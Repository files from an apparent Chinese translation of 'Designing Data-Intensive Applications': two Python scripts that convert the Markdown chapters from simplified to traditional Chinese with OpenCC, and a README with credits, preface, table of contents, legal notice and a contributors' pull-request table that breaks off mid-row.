File: bin/translate.py """Convert zh-cn to zh-tw Refer to https://github.com/BYVoid/OpenCC """ import click import opencc from pathlib import Path from pprint import pprint @click.group() def cli(): pass def convert(infile: str, outfile: str, cfg: str): """read >> convert >> write file Args: infile (str): input file outfile (str): output file cfg (str): config """ converter = opencc.OpenCC(cfg) with open(infile, "r") as inf, open(outfile, "w+") as outf: outf.write("\n".join(converter.convert(line) for line in inf)) print(f"Convert to {outfile}") @cli.command() @click.option("-i", "--input", "infile", required=True) @click.option("-o", "--output", "outfile", required=True) @click.option("-c", "--config", "cfg", required=True, default="s2twp.json") def file(infile: str, outfile: str, cfg: str): """read >> convert >> write file Args: infile (str): input file outfile (str): output file cfg (str): config """ convert(infile, outfile, cfg) @cli.command() @click.option("-i", "--input", "infolder", required=True) @click.option("-o", "--output", "outfolder", required=True) @click.option("-c", "--config", "cfg", required=True, default="s2twp.json") def repo(infolder, outfolder, cfg): if not Path(outfolder).exists(): Path(outfolder).mkdir(parents=True) print(f"Create {outfolder}") infiles = Path(infolder).resolve().glob("*.md") pair = [ {"infile": str(infile), "outfile": str(Path(outfolder).resolve() / infile.name)} for idx, infile in enumerate(infiles) ] for p in pair: convert(p["infile"], p["outfile"], cfg) if __name__ == "__main__": cli() File: bin/zh-tw.py #!/usr/bin/env python3 import os, sys, opencc def convert(src_path, dst_path, cfg='s2twp.json'): converter = opencc.OpenCC(cfg) with open(src_path, "r", encoding='utf-8') as src, open(dst_path, "w+", encoding='utf-8') as dst: dst.write("\n".join( converter.convert(line.rstrip()).replace('(img/', '(../img/') .replace('髮送', '傳送') .replace('髮布', '釋出') .replace('髮生', '發生') .replace('髮出', '發出') .replace('嚐試', '嘗試') .replace('線上性一致', '在線性一致') # 优先按“在线”解析了? .replace('復雜', '複雜') .replace('討論瞭', '討論了') .replace('倒黴', '倒楣') .replace('區域性性', '區域性') .replace('下麵條件', '下面條件') # 优先按“面条”解析了? .replace('當日志', '當日誌') # 优先按“当日”解析了,没有考虑后面的“日志”? .replace('真即時間', '真實時間') # 优先按“实时”解析了,没有考虑前面的“真实”? for line in src)) print("convert %s to %s" % (src_path, dst_path)) if __name__ == '__main__': print(sys.argv) home = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), '..')) os.chdir(home) for f in os.listdir(): if f.endswith('.md'): convert(f, "zh-tw/" + f)
# 设计数据密集型应用 - 中文翻译版 [![Webite: ddia](https://img.shields.io/badge/v1-ddia.pigsty.io-slategray?style=flat)](https://ddia.pigsty.io) [![Webite: ddia2](https://img.shields.io/badge/v2-ddia2.pigsty.io-slategray?style=flat)](https://ddia2.pigsty.io) [![GitHub Stars](https://img.shields.io/github/stars/Vonng/ddia?style=flat&logo=github&logoColor=black&color=slategray)](https://star-history.com/#Vonng/ddia&Date) **作者**: [Martin Kleppmann](https://martin.kleppmann.com),[《Designing Data-Intensive Applications 2nd Edition》](https://learning.oreilly.com/library/view/designing-data-intensive-applications/9781098119058/ch01.html) : 英国剑桥大学分布式系统研究员,演讲者,博主和开源贡献者,软件工程师和企业家,曾在 LinkedIn 和 Rapportive 负责数据基础架构。 **译者**:[冯若航](https://vonng.com) / [Vonng](https://github.com/Vonng) ([email protected]): 创业者,[开源贡献者](https://gitstar-ranking.com/Vonng),PostgreSQL Hacker。开源 RDS PG [Pigsty](https://pigsty.cc/zh/) 与公众号《[非法加冯](https://mp.weixin.qq.com/s/p4Ys10ZdEDAuqNAiRmcnIQ)》作者,[数据库老司机](https://pigsty.cc/zh/blog/db),[云计算泥石流](https://pigsty.cc/zh/blog/cloud),曾于阿里,苹果,探探担任架构师与DBA。 **校订**: [@yingang](https://github.com/yingang) | [繁體中文](zh-tw/README.md) **版本维护** by [@afunTW](https://github.com/afunTW) **阅览**:在本地使用 [Docsify](https://docsify.js.org/) (根目录中执行 `make`) 或 [Typora](https://www.typora.io)、[Gitbook](https://vonng.gitbook.io/vonng/) 以获取最佳阅读体验。 **通知**:DDIA [**第二版**](https://github.com/Vonng/ddia/tree/v2) 正在翻译中 ([`v2`](https://github.com/Vonng/ddia/tree/v2)分支),欢迎加入并提出您的宝贵意见! --------- ## 译序 > 不懂数据库的全栈工程师不是好架构师 > > —— 冯若航 / Vonng 现今,尤其是在互联网领域,大多数应用都属于数据密集型应用。本书从底层数据结构到顶层架构设计,将数据系统设计中的精髓娓娓道来。其中的宝贵经验无论是对架构师、DBA、还是后端工程师、甚至产品经理都会有帮助。 这是一本理论结合实践的书,书中很多问题,译者在实际场景中都曾遇到过,读来让人击节扼腕。如果能早点读到这本书,该少走多少弯路啊! 这也是一本深入浅出的书,讲述概念的来龙去脉而不是卖弄定义,介绍事物发展演化历程而不是事实堆砌,将复杂的概念讲述的浅显易懂,但又直击本质不失深度。每章最后的引用质量非常好,是深入学习各个主题的绝佳索引。 本书为数据系统的设计、实现、与评价提供了很好的概念框架。读完并理解本书内容后,读者可以轻松看破大多数的技术忽悠,与技术砖家撕起来虎虎生风🤣。 这是 2017 年译者读过最好的一本技术类书籍,这么好的书没有中文翻译,实在是遗憾。某不才,愿为先进技术文化的传播贡献一份力量。既可以深入学习有趣的技术主题,又可以锻炼中英文语言文字功底,何乐而不为? --------- ## 前言 > 在我们的社会中,技术是一种强大的力量。数据、软件、通信可以用于坏的方面:不公平的阶级固化,损害公民权利,保护既得利益集团。但也可以用于好的方面:让底层人民发出自己的声音,让每个人都拥有机会,避免灾难。本书献给所有将技术用于善途的人们。 --------- > 计算是一种流行文化,流行文化鄙视历史。流行文化关乎个体身份和参与感,但与合作无关。流行文化活在当下,也与过去和未来无关。我认为大部分(为了钱)编写代码的人就是这样的,他们不知道自己的文化来自哪里。 > > —— 阿兰・凯接受 Dobb 博士的杂志采访时(2012 年) --------- ## 目录 ### [序言](preface.md) ### [第一部分:数据系统基础](part-i.md) * [第一章:可靠性、可伸缩性和可维护性](ch1.md) * [关于数据系统的思考](ch1.md#关于数据系统的思考) * [可靠性](ch1.md#可靠性) * [可伸缩性](ch1.md#可伸缩性) * [可维护性](ch1.md#可维护性) * [本章小结](ch1.md#本章小结) * [第二章:数据模型与查询语言](ch2.md) * [关系模型与文档模型](ch2.md#关系模型与文档模型) * [数据查询语言](ch2.md#数据查询语言) * [图数据模型](ch2.md#图数据模型) * [本章小结](ch2.md#本章小结) * [第三章:存储与检索](ch3.md) * [驱动数据库的数据结构](ch3.md#驱动数据库的数据结构) * [事务处理还是分析?](ch3.md#事务处理还是分析?) * [列式存储](ch3.md#列式存储) * [本章小结](ch3.md#本章小结) * [第四章:编码与演化](ch4.md) * [编码数据的格式](ch4.md#编码数据的格式) * [数据流的类型](ch4.md#数据流的类型) * [本章小结](ch4.md#本章小结) ### [第二部分:分布式数据](part-ii.md) * [第五章:复制](ch5.md) * [领导者与追随者](ch5.md#领导者与追随者) * [复制延迟问题](ch5.md#复制延迟问题) * [多主复制](ch5.md#多主复制) * [无主复制](ch5.md#无主复制) * [本章小结](ch5.md#本章小结) * [第六章:分区](ch6.md) * [分区与复制](ch6.md#分区与复制) * [键值数据的分区](ch6.md#键值数据的分区) * [分区与次级索引](ch6.md#分区与次级索引) * [分区再平衡](ch6.md#分区再平衡) * [请求路由](ch6.md#请求路由) * [本章小结](ch6.md#本章小结) * [第七章:事务](ch7.md) * [事务的棘手概念](ch7.md#事务的棘手概念) * [弱隔离级别](ch7.md#弱隔离级别) * [可串行化](ch7.md#可串行化) * [本章小结](ch7.md#本章小结) * [第八章:分布式系统的麻烦](ch8.md) * [故障与部分失效](ch8.md#故障与部分失效) * [不可靠的网络](ch8.md#不可靠的网络) * [不可靠的时钟](ch8.md#不可靠的时钟) * [知识、真相与谎言](ch8.md#知识、真相与谎言) * [本章小结](ch8.md#本章小结) * [第九章:一致性与共识](ch9.md) * [一致性保证](ch9.md#一致性保证) * [线性一致性](ch9.md#线性一致性) * [顺序保证](ch9.md#顺序保证) * [分布式事务与共识](ch9.md#分布式事务与共识) * [本章小结](ch9.md#本章小结) ### [第三部分:衍生数据](part-iii.md) * [第十章:批处理](ch10.md) * [使用Unix工具的批处理](ch10.md#使用Unix工具的批处理) * [MapReduce和分布式文件系统](ch10.md#MapReduce和分布式文件系统) * [MapReduce之后](ch10.md#MapReduce之后) * [本章小结](ch10.md#本章小结) * [第十一章:流处理](ch11.md) * [传递事件流](ch11.md#传递事件流) * [数据库与流](ch11.md#数据库与流) * [流处理](ch11.md#流处理) * [本章小结](ch11.md#本章小结) * [第十二章:数据系统的未来](ch12.md) * [数据集成](ch12.md#数据集成) * [分拆数据库](ch12.md#分拆数据库) * [将事情做正确](ch12.md#将事情做正确) * [做正确的事情](ch12.md#做正确的事情) * [本章小结](ch12.md#本章小结) ### [术语表](glossary.md) ### [后记](colophon.md) --------- ## 法律声明 从原作者处得知,已经有简体中文的翻译计划,将于 2018 年末完成。[购买地址](https://search.jd.com/Search?keyword=设计数据密集型应用) 译者纯粹出于 **学习目的** 与 **个人兴趣** 翻译本书,不追求任何经济利益。 译者保留对此版本译文的署名权,其他权利以原作者和出版社的主张为准。 本译文只供学习研究参考之用,不得公开传播发行或用于商业用途。有能力阅读英文书籍者请购买正版支持。 --------- ## 贡献 0. 全文校订 by [@yingang](https://github.com/Vonng/ddia/commits?author=yingang) 1. [序言初翻修正](https://github.com/Vonng/ddia/commit/afb5edab55c62ed23474149f229677e3b42dfc2c) by [@seagullbird](https://github.com/Vonng/ddia/commits?author=seagullbird) 2. [第一章语法标点校正](https://github.com/Vonng/ddia/commit/973b12cd8f8fcdf4852f1eb1649ddd9d187e3644) by [@nevertiree](https://github.com/Vonng/ddia/commits?author=nevertiree) 3. [第六章部分校正](https://github.com/Vonng/ddia/commit/d4eb0852c0ec1e93c8aacc496c80b915bb1e6d48) 与[第十章的初翻](https://github.com/Vonng/ddia/commit/9de8dbd1bfe6fbb03b3bf6c1a1aa2291aed2490e) by [@MuAlex](https://github.com/Vonng/ddia/commits?author=MuAlex) 4. [第一部分](part-i.md)前言,[ch2](ch2.md)校正 by [@jiajiadebug](https://github.com/Vonng/ddia/commits?author=jiajiadebug) 5. [词汇表](glossary.md)、[后记](colophon.md)关于野猪的部分 by [@Chowss](https://github.com/Vonng/ddia/commits?author=Chowss) 6. [繁體中文](https://github.com/Vonng/ddia/pulls)版本与转换脚本 by [@afunTW](https://github.com/afunTW) 7. 多处翻译修正 by [@songzhibin97](https://github.com/Vonng/ddia/commits?author=songzhibin97) [@MamaShip](https://github.com/Vonng/ddia/commits?author=MamaShip) [@FangYuan33](https://github.com/Vonng/ddia/commits?author=FangYuan33) 8. 感谢所有作出贡献,提出意见的朋友们: <details> <summary><a href="https://github.com/Vonng/ddia/pulls">Pull Requests</a> & <a href="https://github.com/Vonng/ddia/issues">Issues</a></summary> | ISSUE & Pull Requests | USER | Title | |-------------------------------------------------|------------------------------------------------------------|----------------------------------------------------------------| | [343](https://github.com/Vonng/ddia/pull/343) | [@kehao-chen](https://github.com/kehao-chen) | ch10: 优化一处翻译 | | [341](https://github.com/Vonng/ddia/pull/341) | [@YKIsTheBest](https://github.com/YKIsTheBest) | ch3: 优化两处翻译 | | [340](https://github.com/Vonng/ddia/pull/340) | [@YKIsTheBest](https://github.com/YKIsTheBest) | ch2: 优化多处翻译 | | [338](https://github.com/Vonng/ddia/pull/338) | [@YKIsTheBest](https://github.com/YKIsTheBest) | ch1: 优化一处翻译 | | [335](https://github.com/Vonng/ddia/pull/335) | [@kimi0230](https://github.com/kimi0230) | 修正一处繁体中文错误 | | [334](https://github.com/Vonng/ddia/pull/334) | [@soulrrrrr](https://github.com/soulrrrrr) | ch2: 修正一处繁体中文错误 | | [332](https://github.com/Vonng/ddia/pull/332) | [@justlorain](https://github.com/justlorain) | ch5: 修正一处翻译错误 | | [331](https://github.com/Vonng/ddia/pull/331) | [@Lyianu](https://github.com/Lyianu) | ch9: 更正几处拼写错误 | | [330](https://github.com/Vonng/ddia/pull/330) | [@Lyianu](https://github.com/Lyianu) | ch7: 优化一处翻译 | | [329](https://github.com/Vonng/ddia/issues/329) | [@Lyianu](https://github.com/Lyianu) | ch6: 指出一处翻译错误 | | [328](https://github.com/Vonng/ddia/pull/328) | [@justlorain](https://github.com/justlorain) | ch4: 更正一处翻译遗漏 | | [326](https://github.com/Vonng/ddia/pull/326) | [@liangGTY](https://github.com/liangGTY) | ch1: 优化一处翻译 | | [323](https://github.com/Vonng/ddia/pull/323) | [@marvin263](https://github.com/marvin263) | ch5: 优化一处翻译 | | [322](https://github.com/Vonng/ddia/pull/322) | [@marvin263](https://github.com/marvin263) | ch8: 优化一处翻译 | | [304](https://github.com/Vonng/ddia/pull/304) | [@spike014](https://github.com/spike014) | ch11: 优化一处翻译 | | [298](https://github.com/Vonng/ddia/pull/298) | [@Makonike](https://github.com/Makonike) | ch11&12: 修正两处错误 | | [284](https://github.com/Vonng/ddia/pull/284) | [@WAangzE](https://github.com/WAangzE) | ch4: 更正一处列表错误 | | [283](https://github.com/Vonng/ddia/pull/283) | [@WAangzE](https://github.com/WAangzE) | ch3: 更正一处错别字 | | [282](https://github.com/Vonng/ddia/pull/282) | [@WAangzE](https://github.com/WAangzE) | ch2: 更正一处公式问题 | | [281](https://github.com/Vonng/ddia/pull/281) | [@lyuxi99](https://github.com/lyuxi99) | 更正多处内部链接错误 | | [280](https://github.com/Vonng/ddia/pull/280) | [@lyuxi99](https://github.com/lyuxi99) | ch9: 更正内部链接错误 | | [279](https://github.com/Vonng/ddia/issues/279) | [@codexvn](https://github.com/codexvn) | ch9: 指出公式在 GitHub Pages 显示的问题 | | [278](https://github.com/Vonng/ddia/pull/278) | [@LJlkdskdjflsa](https://github.com/LJlkdskdjflsa) | 发现了繁体中文版本中的错误翻译 | | [275](https://github.com/Vonng/ddia/pull/275) | [@117503445](https://github.com/117503445) | 更正 LICENSE 链接 | | [274](https://github.com/Vonng/ddia/pull/274) | [@uncle-lv](https://github.com/uncle-lv) | ch7: 修正错别字 | | [273](https://github.com/Vonng/ddia/pull/273) | [@Sdot-Python](https://github.com/Sdot-Python) | ch7: 统一了 write skew 的翻译 | | [271](https://github.com/Vonng/ddia/pull/271) | [@Makonike](https://github.com/Makonike) | ch6: 统一了 rebalancing 的翻译 | | [270](https://github.com/Vonng/ddia/pull/270) | [@Ynjxsjmh](https://github.com/Ynjxsjmh) | ch7: 修正不一致的翻译 | | [263](https://github.com/Vonng/ddia/pull/263) | [@zydmayday](https://github.com/zydmayday) | ch5: 修正译文中的重复单词 | | [260](https://github.com/Vonng/ddia/pull/260) | [@haifeiWu](https://github.com/haifeiWu) | ch4: 修正部分不准确的翻译 | | [258](https://github.com/Vonng/ddia/pull/258) | [@bestgrc](https://github.com/bestgrc) | ch3: 修正一处翻译错误 | | [257](https://github.com/Vonng/ddia/pull/257) | [@UnderSam](https://github.com/UnderSam) | ch8: 修正一处拼写错误 | | [256](https://github.com/Vonng/ddia/pull/256) | [@AlphaWang](https://github.com/AlphaWang) | ch7: 修正“可串行化”相关内容的多处翻译不当 | | [255](https://github.com/Vonng/ddia/pull/255) | [@AlphaWang](https://github.com/AlphaWang) | ch7: 修正“可重复读”相关内容的多处翻译不当 | | [253](https://github.com/Vonng/ddia/pull/253) | [@AlphaWang](https://github.com/AlphaWang) | ch7: 修正“读已提交”相关内容的多处翻译不当 | | [246](https://github.com/Vonng/ddia/pull/246) | [@derekwu0101](https://github.com/derekwu0101) | ch3: 修正繁体中文的转译错误 | | [245](https://github.com/Vonng/ddia/pull/245) | [@skyran1278](https://github.com/skyran1278) | ch12: 修正繁体中文的转译错误 | | [244](https://github.com/Vonng/ddia/pull/244) | [@Axlgrep](https://github.com/Axlgrep) | ch9: 修正不通顺的翻译 | | [242](https://github.com/Vonng/ddia/pull/242) | [@lynkeib](https://github.com/lynkeib) | ch9: 修正不通顺的翻译 | | [241](https://github.com/Vonng/ddia/pull/241) | [@lynkeib](https://github.com/lynkeib) | ch8: 修正不正确的公式格式 | | [240](https://github.com/Vonng/ddia/pull/240) | [@8da2k](https://github.com/8da2k) | ch9: 修正不通顺的翻译 | | [239](https://github.com/Vonng/ddia/pull/239) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | ch7: 修正不一致的翻译 | | [237](https://github.com/Vonng/ddia/pull/237) | [@zhangnew](https://github.com/zhangnew) | ch3: 修正错误的图片链接 | | [229](https://github.com/Vonng/ddia/pull/229) | [@lis186](https://github.com/lis186) | 指出繁体中文的转译错误:复杂 | | [226](https://github.com/Vonng/ddia/pull/226) | [@chroming](https://github.com/chroming) | ch1: 修正导航栏中的章节名称 | | [220](https://github.com/Vonng/ddia/pull/220) | [@skyran1278](https://github.com/skyran1278) | ch9: 修正线性一致的繁体中文翻译 | | [194](https://github.com/Vonng/ddia/pull/194) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | ch4: 修正错误的翻译 | | [193](https://github.com/Vonng/ddia/pull/193) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | ch4: 优化译文 | | [192](https://github.com/Vonng/ddia/pull/192) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | ch4: 修正不一致和不通顺的翻译 | | [190](https://github.com/Vonng/ddia/pull/190) | [@Pcrab](https://github.com/Pcrab) | ch1: 修正不准确的翻译 | | [187](https://github.com/Vonng/ddia/pull/187) | [@narojay](https://github.com/narojay) | ch9: 修正生硬的翻译 | | [186](https://github.com/Vonng/ddia/pull/186) | [@narojay](https://github.com/narojay) | ch8: 修正错别字 | | [185](https://github.com/Vonng/ddia/issues/185) | [@8da2k](https://github.com/8da2k) | 指出小标题跳转的问题 | | [184](https://github.com/Vonng/ddia/pull/184) | [@DavidZhiXing](https://github.com/DavidZhiXing) | ch10: 修正失效的网址 | | [183](https://github.com/Vonng/ddia/pull/183) | [@OneSizeFitsQuorum](https://github.com/OneSizeFitsQuorum) | ch8: 修正错别字 | | [182](https://github.com/Vonng/ddia/issues/182) | [@lroolle](https://github.com/lroolle) | 建议docsify的主题风格 | | [181](https://github.com/Vonng/ddia/pull/181) | [@YunfengGao](https://github.com/YunfengGao) | ch2: 修正翻译错误 | | [180](https://github.com/Vonng/ddia/pull/180) | [@skyran1278](https://github.com/skyran1278) | ch3: 指出繁体中文的转译错误 | | [177](https://github.com/Vonng/ddia/pull/177) | [@exzhawk](https://github.com/exzhawk) | 支持 Github Pages 里的公式显示 | | [176](https://github.com/Vonng/ddia/pull/176) | [@haifeiWu](https://github.com/haifeiWu) | ch2: 语义网相关翻译更正 | | [175](https://github.com/Vonng/ddia/pull/175) | [@cwr31](https://github.com/cwr31) | ch7: 不变式相关翻译更正 | | [174](https://github.com/Vonng/ddia/pull/174) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | README & preface: 更正不正确的中文用词和标点符号 | | [173](https://github.com/Vonng/ddia/pull/173) | [@ZvanYang](https://github.com/ZvanYang) | ch12: 修正不完整的翻译 | | [171](https://github.com/Vonng/ddia/pull/171) | [@ZvanYang](https://github.com/ZvanYang) | ch12: 修正重复的译文 | | [169](https://github.com/Vonng/ddia/pull/169) | [@ZvanYang](https://github.com/ZvanYang) | ch12: 更正不太通顺的翻译 | | [166](https://github.com/Vonng/ddia/pull/166) | [@bp4m4h94](https://github.com/bp4m4h94) | ch1: 发现错误的文献索引 | | [164](https://github.com/Vonng/ddia/pull/164) | [@DragonDriver](https://github.com/DragonDriver) | preface: 更正错误的标点符号 | | [163](https://github.com/Vonng/ddia/pull/163) | [@llmmddCoder](https://github.com/llmmddCoder) | ch1: 更正错误字 | | [160](https://github.com/Vonng/ddia/pull/160) | [@Zhayhp](https://github.com/Zhayhp) | ch2: 建议将 network model 翻译为网状模型 | | [159](https://github.com/Vonng/ddia/pull/159) | [@1ess](https://github.com/1ess) | ch4: 更正错误字 | | [157](https://github.com/Vonng/ddia/pull/157) | [@ZvanYang](https://github.com/ZvanYang) | ch7: 更正不太通顺的翻译 | | [155](https://github.com/Vonng/ddia/pull/155) | [@ZvanYang](https://github.com/ZvanYang) | ch7: 更正不太通顺的翻译 | | [153](https://github.com/Vonng/ddia/pull/153) | [@DavidZhiXing](https://github.com/DavidZhiXing) | ch9: 修正缩略图的错别字 | | [152](https://github.com/Vonng/ddia/pull/152) | [@ZvanYang](https://github.com/ZvanYang) | ch7: 除重->去重 | | [151](https://github.com/Vonng/ddia/pull/151) | [@ZvanYang](https://github.com/ZvanYang) | ch5: 修订sibling相关的翻译 | | [147](https://github.com/Vonng/ddia/pull/147) | [@ZvanYang](https://github.com/ZvanYang) | ch5: 更正一处不准确的翻译 | | [145](https://github.com/Vonng/ddia/pull/145) | [@Hookey](https://github.com/Hookey) | 识别了当前简繁转译过程中处理不当的地方,暂通过转换脚本规避 | | [144](https://github.com/Vonng/ddia/issues/144) | [@secret4233](https://github.com/secret4233) | ch7: 不翻译`next-key locking` | | [143](https://github.com/Vonng/ddia/issues/143) | [@imcheney](https://github.com/imcheney) | ch3: 更新残留的机翻段落 | | [142](https://github.com/Vonng/ddia/issues/142) | [@XIJINIAN](https://github.com/XIJINIAN) | 建议去除段首的制表符 | | [141](https://github.com/Vonng/ddia/issues/141) | [@Flyraty](https://github.com/Flyraty) | ch5: 发现一处错误格式的章节引用 | | [140](https://github.com/Vonng/ddia/pull/140) | [@Bowser1704](https://github.com/Bowser1704) | ch5: 修正章节Summary中多处不通顺的翻译 | | [139](https://github.com/Vonng/ddia/pull/139) | [@Bowser1704](https://github.com/Bowser1704) | ch2&ch3: 修正多处不通顺的或错误的翻译 | | [137](https://github.com/Vonng/ddia/pull/137) | [@fuxuemingzhu](https://github.com/fuxuemingzhu) | ch5&ch6: 优化多处不通顺的或错误的翻译 | | [134](https://github.com/Vonng/ddia/pull/134) | [@fuxuemingzhu](https://github.com/fuxuemingzhu) | ch4: 优化多处不通顺的或错误的翻译 | | [133](https://github.com/Vonng/ddia/pull/133) | [@fuxuemingzhu](https://github.com/fuxuemingzhu) | ch3: 优化多处错误的或不通顺的翻译 | | [132](https://github.com/Vonng/ddia/pull/132) | [@fuxuemingzhu](https://github.com/fuxuemingzhu) | ch3: 优化一处容易产生歧义的翻译 | | [131](https://github.com/Vonng/ddia/pull/131) | [@rwwg4](https://github.com/rwwg4) | ch6: 修正两处错误的翻译 | | [129](https://github.com/Vonng/ddia/pull/129) | [@anaer](https://github.com/anaer) | ch4: 修正两处强调文本和四处代码变量名称 | | [128](https://github.com/Vonng/ddia/pull/128) | [@meilin96](https://github.com/meilin96) | ch5: 修正一处错误的引用 | | [126](https://github.com/Vonng/ddia/pull/126) | [@cwr31](https://github.com/cwr31) | ch10: 修正一处错误的翻译(功能 -> 函数) | | [125](https://github.com/Vonng/ddia/pull/125) | [@dch1228](https://github.com/dch1228) | ch2: 优化 how best 的翻译(如何以最佳方式) | | [123](https://github.com/Vonng/ddia/pull/123) | [@yingang](https://github.com/yingang) | translation updates (chapter 9, TOC in readme, glossary, etc.) | | [121](https://github.com/Vonng/ddia/pull/121) | [@yingang](https://github.com/yingang) | translation updates (chapter 5 to chapter 8) | | [120](https://github.com/Vonng/ddia/pull/120) | [@jiong-han](https://github.com/jiong-han) | Typo fix: 呲之以鼻 -> 嗤之以鼻 | | [119](https://github.com/Vonng/ddia/pull/119) | [@cclauss](https://github.com/cclauss) | Streamline file operations in convert() | | [118](https://github.com/Vonng/ddia/pull/118) | [@yingang](https://github.com/yingang) | translation updates (chapter 2 to chapter 4) | | [117](https://github.com/Vonng/ddia/pull/117) | [@feeeei](https://github.com/feeeei) | 统一每章的标题格式 | | [115](https://github.com/Vonng/ddia/pull/115) | [@NageNalock](https://github.com/NageNalock) | 第七章病句修改: 重复词语 | | [114](https://github.com/Vonng/ddia/pull/114) | [@Sunt-ing](https://github.com/Sunt-ing) | Update README.md: correct the book name | | [113](https://github.com/Vonng/ddia/pull/113) | [@lpxxn](https://github.com/lpxxn) | 修改语句 | | [112](https://github.com/Vonng/ddia/pull/112) | [@ibyte2011](https://github.com/ibyte2011) | Update ch9.md | | [110](https://github.com/Vonng/ddia/pull/110) | [@lpxxn](https://github.com/lpxxn) | 读已写入数据 | | [107](https://github.com/Vonng/ddia/pull/107) | [@abbychau](https://github.com/abbychau) | 單調鐘和好死还是赖活着 | | [106](https://github.com/Vonng/ddia/pull/106) | [@enochii](https://github.com/enochii) | typo in ch2: fix braces typo | | [105](https://github.com/Vonng/ddia/pull/105) | [@LiminCode](https://github.com/LiminCode) | Chronicle translation error | | [104](https://github.com/Vonng/ddia/pull/104) | [@Sunt-ing](https://github.com/Sunt-ing) | several advice for better translation | | [103](https://github.com/Vonng/ddia/pull/103) | [@Sunt-ing](https://github.com/Sunt-ing) | typo in ch4: should be 完成 rather than 完全 | | [102](https://github.com/Vonng/ddia/pull/102) | [@Sunt-ing](https://github.com/Sunt-ing) | ch4: better-translation: 扼杀 → 破坏 | | [101](https://github.com/Vonng/ddia/pull/101) | [@Sunt-ing](https://github.com/Sunt-ing) | typo in Ch4: should be "改变" rathr than "盖面" | | [100](https://github.com/Vonng/ddia/pull/100) | [@LiminCode](https://github.com/LiminCode) | fix missing translation | | [99 ](https://github.com/Vonng/ddia/pull/99) | [@mrdrivingduck](https://github.com/mrdrivingduck) | ch6: fix the word rebalancing | | [98 ](https://github.com/Vonng/ddia/pull/98) | [@jacklightChen](https://github.com/jacklightChen) | fix ch7.md: fix wrong references | | [97 ](https://github.com/Vonng/ddia/pull/97) | [@jenac](https://github.com/jenac) | 96 | | [96 ](https://github.com/Vonng/ddia/pull/96) | [@PragmaTwice](https://github.com/PragmaTwice) | ch2: fix typo about 'may or may not be' | | [95 ](https://github.com/Vonng/ddia/pull/95) | [@EvanMu96](https://github.com/EvanMu96) | fix translation of "the battle cry" in ch5 | | [94 ](https://github.com/Vonng/ddia/pull/94) | [@kemingy](https://github.com/kemingy) | ch6: fix markdown and punctuations | | [93 ](https://github.com/Vonng/ddia/pull/93) | [@kemingy](https://github.com/kemingy) | ch5: fix markdown and some typos | | [92 ](https://github.com/Vonng/ddia/pull/92) | [@Gilbert1024](https://github.com/Gilbert1024) | Merge pull request #1 from Vonng/master | | [88 ](https://github.com/Vonng/ddia/pull/88) | [@kemingy](https://github.com/kemingy) | fix typo for ch1, ch2, ch3, ch4 | | [87 ](https://github.com/Vonng/ddia/pull/87) | [@wynn5a](https://github.com/wynn5a) | Update ch3.md | | [86 ](https://github.com/Vonng/ddia/pull/86) | [@northmorn](https://github.com/northmorn) | Update ch1.md | | [85 ](https://github.com/Vonng/ddia/pull/85) | [@sunbuhui](https://github.com/sunbuhui) | fix ch2.md: fix ch2 ambiguous translation | | [84 ](https://github.com/Vonng/ddia/pull/84) | [@ganler](https://github.com/ganler) | Fix translation: use up | | [83 ](https://github.com/Vonng/ddia/pull/83) | [@afunTW](https://github.com/afunTW) | Using OpenCC to convert from zh-cn to zh-tw | | [82 ](https://github.com/Vonng/ddia/pull/82) | [@kangni](https://github.com/kangni) | fix gitbook url | | [78 ](https://github.com/Vonng/ddia/pull/78) | [@hanyu2](https://github.com/hanyu2) | Fix unappropriated translation | | [77 ](https://github.com/Vonng/ddia/pull/77) | [@Ozarklake](https://github.com/Ozarklake) | fix typo | | [75 ](https://github.com/Vonng/ddia/pull/75) | [@2997ms](https://github.com/2997ms) | Fix typo | | [74 ](https://github.com/Vonng/ddia/pull/74) | [@2997ms](https://github.com/2997ms) | Update ch9.md | | [70 ](https://github.com/Vonng/ddia/pull/70) | [@2997ms](https://github.com/2997ms) | Update ch7.md | | [67 ](https://github.com/Vonng/ddia/pull/67) | [@jiajiadebug](https://github.com/jiajiadebug) | fix issues in ch2 - ch9 and glossary | | [66 ](https://github.com/Vonng/ddia/pull/66) | [@blindpirate](https://github.com/blindpirate) | Fix typo | | [63 ](https://github.com/Vonng/ddia/pull/63) | [@haifeiWu](https://github.com/haifeiWu) | Update ch10.md | | [62 ](https://github.com/Vonng/ddia/pull/62) | [@ych](https://github.com/ych) | fix ch1.md typesetting problem | | [61 ](https://github.com/Vonng/ddia/pull/61) | [@xianlaioy](https://github.com/xianlaioy) | docs:钟-->种,去掉ou | | [60 ](https://github.com/Vonng/ddia/pull/60) | [@Zombo1296](https://github.com/Zombo1296) | 否则 -> 或者 | | [59 ](https://github.com/Vonng/ddia/pull/59) | [@AlexanderMisel](https://github.com/AlexanderMisel) | 呼叫->调用,显着->显著 | | [58 ](https://github.com/Vonng/ddia/pull/58) | [@ibyte2011](https://github.com/ibyte2011) | Update ch8.md | | [55 ](https://github.com/Vonng/ddia/pull/55) | [@saintube](https://github.com/saintube) | ch8: 修改链接错误 | | [54 ](https://github.com/Vonng/ddia/pull/54) | [@Panmax](https://github.com/Panmax) | Update ch2.md | | [53 ](https://github.com/Vonng/ddia/pull/53) | [@ibyte2011](https://github.com/ibyte2011) | Update ch9.md | | [52 ](https://github.com/Vonng/ddia/pull/52) | [@hecenjie](https://github.com/hecenjie) | Update ch1.md | | [51 ](https://github.com/Vonng/ddia/pull/51) | [@latavin243](https://github.com/latavin243) | fix 修正ch3 ch4几处翻译 | | [50 ](https://github.com/Vonng/ddia/pull/50) | [@AlexZFX](https://github.com/AlexZFX) | 几个疏漏和格式错误 | | [49 ](https://github.com/Vonng/ddia/pull/49) | [@haifeiWu](https://github.com/haifeiWu) | Update ch1.md | | [48 ](https://github.com/Vonng/ddia/pull/48) | [@scaugrated](https://github.com/scaugrated) | fix typo | | [47 ](https://github.com/Vonng/ddia/pull/47) | [@lzwill](https://github.com/lzwill) | Fixed typos in ch2 | | [45 ](https://github.com/Vonng/ddia/pull/45) | [@zenuo](https://github.com/zenuo) | 删除一个多余的右括号 | | [44 ](https://github.com/Vonng/ddia/pull/44) | [@akxxsb](https://github.com/akxxsb) | 修正第七章底部链接错误 | | [43 